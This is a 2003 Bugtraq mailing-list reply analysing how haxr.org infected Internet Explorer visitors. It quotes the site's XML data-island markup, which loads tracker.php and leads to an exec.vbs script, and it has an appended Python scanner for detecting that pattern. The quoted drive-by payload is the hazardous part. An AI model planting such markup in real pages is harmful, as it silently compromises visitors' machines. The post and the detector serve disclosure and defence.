Bugtraq mailing list archives

RE: [Fwd: Re: AIM Password theft]
From: S G Masood <sgmasood () yahoo com>
Date: Tue, 23 Sep 2003 15:50:23 -0700 (PDT)

Hi Mark,

www.Haxr.org uses the "XML Page Object Type Validation
Vulnerability" [1] to infect IE users automatically.
Here is the code from the site:


<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>

This is almost an exact copy of the PoC exploit posted
for this vuln.

tracker.php points to the exec.vbs script that you
posted. This finally gets executed on the victim
machine and does its stuff.

If this is new, it's going to spread like wildfire.

It will infect many machines but IMO, it wouldn't
exactly spread like "wildfire" 'coz it has a "single
point of failure". Have you considered complaining to
the hosting service of www.haxr.org?


--
Regards,
S.G.Masood

Hyderabad,
India
--
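The markup quoted above relies on one IE-specific feature: an element bound to a field of an in-page <xml> data island with dataformatas="html", so that whatever the field holds (here an <object> inside CDATA) is rendered as live markup rather than text. The following is an added example, not code from the post or from haxr.org, of a small scanner that looks for exactly that combination in saved page source. It flags <object> as the post shows, and additionally treats script, iframe, embed and applet as active tags; that extension, the sample pages and the helper names are assumptions of this example.

```python
import re

# Constructed sample page, modelled on the markup quoted in the post above
# (data-bound <span> plus an <xml> data island whose CDATA carries markup).
SAMPLE_PAGE = """<html><body>
<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>
</body></html>"""

# Constructed benign page: same data-binding feature, but the bound field is
# rendered as text (no dataformatas="html") and carries no markup.
BENIGN_PAGE = """<html><body>
<span datasrc="#oNames" datafld="name"></span>
<xml id="oNames"><names><name>Alice</name></names></xml>
</body></html>"""

TAG_RE = re.compile(r'<([A-Za-z]\w*)\b([^>]*)>')
XML_ISLAND_RE = re.compile(
    r'<xml\s+id\s*=\s*["\']?(\w+)["\']?[^>]*>(.*?)</xml>', re.I | re.S)
CDATA_RE = re.compile(r'<!\[CDATA\[(.*?)\]\]>', re.S)
# Elements that load or run code when IE renders bound data as HTML.
# <object> is what the post shows; the others are an assumed extension.
ACTIVE_TAG_RE = re.compile(r'<\s*(object|script|iframe|embed|applet)\b', re.I)


def get_attr(attrs, name):
    """Return the value of attribute `name` from a raw attribute string,
    accepting double-quoted, single-quoted and unquoted forms, or None."""
    m = re.search(r'\b' + name + r'\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))',
                  attrs, re.I)
    if not m:
        return None
    return next(v for v in m.groups() if v is not None)


def find_html_bound_islands(page):
    """Flag elements that bind a field of an in-page <xml> island with
    dataformatas="html", and list the active tags found in that island.

    Returns a list of dicts, one per suspicious binding."""
    islands = {m.group(1).lower(): m.group(2)
               for m in XML_ISLAND_RE.finditer(page)}
    findings = []
    for m in TAG_RE.finditer(page):
        tag, attrs = m.group(1).lower(), m.group(2)
        src = get_attr(attrs, 'datasrc')
        if not src or not src.startswith('#'):
            continue                       # not bound to an in-page island
        fmt = get_attr(attrs, 'dataformatas') or 'text'
        if fmt.lower() != 'html':
            continue                       # text binding: markup shown literally
        island_id = src[1:].lower()
        body = islands.get(island_id)
        if body is None:
            continue                       # island not present in this page
        # CDATA is where the quoted exploit hides its markup; fall back to
        # the raw island body if there is no CDATA section.
        payload = ''.join(CDATA_RE.findall(body)) or body
        active = sorted({t.lower() for t in ACTIVE_TAG_RE.findall(payload)})
        findings.append({
            'element': tag,
            'island': island_id,
            'field': (get_attr(attrs, 'datafld') or '').lower(),
            'active_tags': active,
        })
    return findings


if __name__ == '__main__':
    for name, page in (('sample', SAMPLE_PAGE), ('benign', BENIGN_PAGE)):
        print(name, find_html_bound_islands(page))
```

Run against the sample it reports one span bound to island oExec, field counter, with an object tag in the payload; the benign page, which binds as text, produces nothing. It is a source-level heuristic for proxies or mail gateways, not a substitute for patching IE.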
